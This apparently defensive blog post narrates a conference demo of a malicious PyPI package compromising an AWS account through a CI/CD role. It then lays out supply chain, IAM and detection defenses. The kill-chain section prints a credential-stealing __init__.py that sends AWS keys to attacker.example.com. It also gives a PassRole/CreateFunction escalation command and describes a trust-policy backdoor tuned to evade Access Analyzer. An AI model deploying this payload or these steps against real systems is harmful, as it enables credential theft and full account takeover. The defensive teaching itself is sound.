From pip install to Root: anatomy of an AWS supply chain attack

Mon, 29 Jun 2026 09:00:00 -0300

The scene is familiar: you add a dependency to the requirements.txt of your CI/CD pipeline, run pip install, and the installer terminates without warnings, with all dependencies resolved. Five minutes later someone on the internet is authenticated to your AWS account, has deployed a Lambda with administrative permissions and dumped your customer PII table, and you did not run anything else in that interval beyond that single pip install.

I demoed exactly that live at AWS Community Day Brasil 2026 on Saturday, June 27. The event was excellent, very well organized, and I was happy to see so many people wanting to learn AWS. This post is the step-by-step of the attack and the step-by-step of the defense.

Why this matters

Supply chain attacks have grown year over year as tracked by industry reports, and the LiteLLM incident in March 2026 is a recent public example that illustrates the pattern: the litellm PyPI package was compromised for an approximately five-hour window, with a credential stealer published in two malicious versions (1.82.7 and 1.82.8) that executed at the moment of import litellm, leaking AWS keys, SSH keys, and orchestration tokens to attacker-controlled infrastructure across every environment that ran pip install litellm during the window without version pinning. LiteLLM itself published a disclosure of the incident at docs.litellm.ai/blog/security-update-march-2026 with documented IoCs and a confirmed compromise window.

The detail that tends to get missed in this category of attack is that the target is CI/CD identities specifically, not the application credentials in production. CI/CD is where the most privileged identities live, because deploy pipelines need to create Lambdas, update policies, and do PassRole for a wide range of roles, which gives those identities broader IAM access than any production application. At the same time, those same pipelines routinely execute third-party code (PyPI packages, npm packages) as part of the build, creating the exact attack surface: high privilege combined with unaudited code execution.

The IAM role that processes your deploy probably has iam:PassRole on Resource: * and iam:UpdateAssumeRolePolicy, because the alternative of mapping every specific PassRole that some future deploy might need is tedious and rarely done correctly in mature pipelines. If a malicious package gets to execute inside that role, it inherits those permissions and uses them against you, which means you just gave root to someone who never interacted with your infrastructure directly.

The difference from other types of breach is that here you were not hacked by an external attacker who discovered a vulnerability in your application. You voluntarily installed your own compromise, with pip install, running the exact same command that will run a hundred more times in the coming months without ever triggering a single review.

The kill chain, live

On the demo I ran the full chain in three color-coded terminals side by side: victim in green, attacker in red, defender in cyan. The eight steps below follow the chronological order of execution, with the technical detail of what happens at each one.

1. Victim installs a package. The package called aws_lambda_utils_helpers looks like a utility helper for Lambda functions, with a name plausible enough to slip past a dependency code review:

1

pip install aws_lambda_utils_helpers

The installation completes without warnings, signature-based package scanners do not detect anything because the package is new enough to not have been cataloged yet, and the setup.py contains nothing visibly malicious to anyone doing a quick inspection.

2. The code imports the module. When the application runs from lambda_helpers import format_response during actual execution (in a Lambda, in an ECS container, or in the CI/CD runner), Python executes the __init__.py of the package before returning the imported module, and this is the moment when the payload is executed, not during the original pip install, which only copies files to the filesystem without invoking any application code.

The content of the __init__.py in a simplified version for this post:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


import os, socket, json, threading

def _exfil():
 creds = {
 "key": os.environ.get("AWS_ACCESS_KEY_ID"),
 "secret": os.environ.get("AWS_SECRET_ACCESS_KEY"),
 "token": os.environ.get("AWS_SESSION_TOKEN"),
 }
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect(("attacker.example.com", 4444))
 s.send(json.dumps(creds).encode())

threading.Thread(target=_exfil, daemon=True).start()

The choice of a daemon thread is deliberate, because the main process continues normally, the application responds with the expected latency, and no observable effect shows up in the Lambda logs, while the credentials leak in parallel over raw TCP to the endpoint controlled by the attacker.

3. The environment variables are already there. In every Lambda, every ECS container, every CI/CD deploy runner, the STS credentials are exposed as environment variables because it is the standard way the AWS SDK and CLI consume credentials in those contexts. The malicious package only needs to read os.environ, with no need to exploit any vulnerability in the host nor to escalate privilege at the operating system level, because the credentials are delivered by the runtime in exactly the format the exfiltration code needs.

4. Attacker validates what was received. On the attacker side, a nc -l 4444 captures the JSON arriving over the socket, and the first reflex is to run aws sts get-caller-identity with the captured credentials, confirming that the session is authenticated as cicd-deploy-role and validating that the STS token is still active within its one-hour TTL before proceeding.

5. Reconnaissance. The attacker runs enumeration to map what this identity can do: which Lambda functions already exist, which roles have administrative permissions, and which of those roles trust lambda.amazonaws.com in the trust policy and therefore can be executed via Lambda. A very common pattern in production accounts is the existence of at least one legacy role with AdministratorAccess that trusts Lambda, typically created for some old project or at a moment when someone needed to debug something “quickly” and never had the role removed afterwards. I will call that role data-pipeline-role.

6. PassRole + CreateFunction = admin. The CI/CD identity has iam:PassRole on * because deploy pipelines need to do PassRole for varied Lambdas, and has lambda:CreateFunction for the same reason. The attacker combines the two in a single call that creates a new Lambda passing data-pipeline-role as the execution role:

1
2
3
4
5
6


aws lambda create-function \
 --function-name exfil \
 --role arn:aws:iam::123456789012:role/data-pipeline-role \
 --runtime python3.12 \
 --handler index.handler \
 --zip-file fileb://payload.zip

The Lambda now executes as data-pipeline-role, which carries AdministratorAccess via the Lambda trust policy, and invoking the function fires the attacker’s payload with full permissions in the AWS account. Less than 30 seconds after the malicious import, the attacker has the operational equivalent of admin in the account.

7. Smash and grab. The Lambda payload scans the DynamoDB customer table and dumps the PII rows back to the attacker’s endpoint. On the Community Day demo I showed 8 records, but the same code works with 8 million, given that the Lambda pays for its own compute and the attacker does not use a single byte of his own account quota for the processing. Five minutes from the original pip install to the PII rows leaving your AWS account through the exfiltration socket.

8. Persistence. The attacker knows the CI/CD STS credentials have a one-hour TTL and will be lost soon to natural token rotation, so while the CI/CD credentials are still active (those credentials carry iam:UpdateAssumeRolePolicy in the policy, the exact permission that step 6 did not get to use), the trust policy of data-pipeline-role is edited to trust a role the attacker controls, which can be a role in another account or, in the more sophisticated pattern, a same-account role with a specific sts:ExternalId condition. When the original credentials expire through rotation, the backdoor stays planted, and the attacker can come back through the back door by assuming that backup role at any future moment.

The choice of same-account with ExternalId condition is deliberate to avoid detection, because “external trust” detectors like AWS Access Analyzer fire alerts when a role starts to trust a principal from another account or *, but same-account trust with a specific Principal and ExternalId condition slips past the heuristics those scanners use. You see no alert on the console, the security team gets no automated ticket, and the persistence sits planted, waiting for the attacker to come back whenever convenient.

Three layers of defense

None of the layers below blocks 100% of attacks by itself, but implemented together they block roughly 90% of attacks following this specific pattern. I list them in the order of the earliest in the kill chain to the latest, because the defense ROI drops as you delay detection further into the chain.

Layer 1: supply chain hygiene. The attack only works if the malicious package enters your build, so the first layer controls exactly what gets in:

Cooldowns on new packages, with versions published less than N days ago (I use 7 as a default) blocked at your internal package proxy (Nexus, Artifactory, or AWS CodeArtifact), because attackers need the package to be installed quickly after the compromise to capture as many credentials as possible before PyPI removes the package from the registry. A one-week cooldown defeats the window of opportunity for these attacks.
Strict version pinning, with aws_lambda_utils_helpers==1.2.3 instead of aws_lambda_utils_helpers>=1.2.0, combined with hash check in requirements.txt or the equivalent in your package manager (Poetry lock, package-lock.json, and so on), so that today’s build consumes exactly the same package that yesterday’s build did, rather than silently accepting a new version published in between.
Audit of recent imports, which is not a review of what has been in requirements.txt for years (the historical catalog), but a review of what entered requirements.txt last week, who added it, and why. Most of the risk concentrates in new imports, not in older imports that already passed through multiple builds and multiple eyes.

Layer 2: identity hardening. If the malicious package is already running inside your Lambda or CI container, the defense has to be IAM, focused on two specific changes in the CI/CD identity policy:

Scope iam:PassRole to a closed set of safe roles instead of Resource: *, ideally a single role (cicd-lambda-safe-role) that carries only the minimum permissions necessary for application Lambda execution. With PassRole scoped this way, data-pipeline-role (which has AdministratorAccess via legacy) simply is not in the set of roles the attacker can pass to a new Lambda function, and the escalation to admin fails with AccessDenied at the moment of CreateFunction.
Remove iam:UpdateAssumeRolePolicy from the CI/CD policy, because legitimate pipelines almost never need to modify trust policies on existing roles. They create new roles, yes, but modifying the trust of a role that already exists is a rare and suspicious operation by default, and when you remove that permission the persistence via trust policy backdoor breaks at step 8 of the chain.

These two changes in the CI/CD policy JSON break the entire kill chain from step 4 onwards: scoped PassRole blocks the escalation to admin at the moment of creating the exfiltrator Lambda, and removed UpdateAssumeRolePolicy blocks the backdoor persistence. The attacker can still run the initial credential exfiltration (steps 1 to 4 of the chain), but loses the ability to turn that into full account compromise.

Layer 3: runtime detection. Even with the two previous layers in place, you should not trust that the policy is written perfectly, and therefore you monitor the actual execution:

CloudTrail with Athena (or the equivalent in your observability stack) with an alert on CreateFunction or UpdateFunctionConfiguration called by a CI/CD identity in production outside the expected deploy window. In a healthy account these events have low frequency and a predictable temporal profile, so any call outside that profile has high signal and merits immediate investigation.
Alert on UpdateAssumeRolePolicy without exception. This event is extremely rare in a well-operated production account, and any occurrence merits an immediate human look even when it comes from a known identity, because it is exactly the event that signals an attempt at trust policy backdoor persistence.
Network egress monitoring at the Lambda Functions and ECS tasks level, because raw TCP connections going out to non-AWS IPs are suspicious by default. Tools like AWS Network Firewall or DPI tooling at the VPC level let you alert or block this pattern before the credentials actually leave the perimeter.

Have you already been compromised?

If you are reading this and suspect you may have been affected by a similar attack in the past months, three immediate queries to run on CloudTrail before going further: (1) iam:CreateFunction or iam:UpdateAssumeRolePolicy calls coming from your CI/CD identity outside the expected deploy window in the last 90 days, (2) recent sts:AssumeRole events coming from IPs outside known AWS ranges, and (3) modifications to the trust policies of roles that carry administrative permissions. Any one of those three signals is reason to alert the security team and rotate credentials before doing anything else.

Three actions for Monday

You finished reading the post, and the post only has real value if you do something concrete with it. Here are three actions you can execute on Monday morning:

1. List the roles with iam:PassRole and Resource: * using your preferred tool (AWS CLI, Steampipe, CloudQuery, Access Analyzer, or whatever your organization standardized for IAM inventory). You will probably find that more than one role has this permission open this widely, and the recommendation is to start with CI/CD identities because those are the ones that most expose you to the attack pattern described in this post.

2. List the roles with iam:UpdateAssumeRolePolicy with the same tool, and for each one of them ask the direct question: does this role really need that permission in production, or was it granted at some moment by convenience and never reassessed afterwards? The correct answer for almost all of them is “does not need it”, and the corresponding action is to remove the permission.

3. Audit the packages that entered your requirements.txt or package.json in the last 30 days, and for each new package answer: when was it published? By which author? Does the author have other publications before this one? Does the package have prior historical versions, or is it a single recent version with no release history? Packages that match the profile of “single, recent version, author with no history” merit careful manual investigation before you approve the next build with them included in requirements.

The total work amounts to around three hours, considering you spend one hour on each action above. Cost: three hours of engineering time. Protection: 90%+ of supply chain attacks in the format described in this post, blocked structurally. It is probably the best security ROI you can produce this month with the engineering time available in your calendar.

Slides and demo

The full presentation with the 11 slides and the live demo of the three terminals is available as a navigable deck: Full presentation deck. Use the keyboard arrows to navigate between slides, and the F key for fullscreen.

See you around, Leo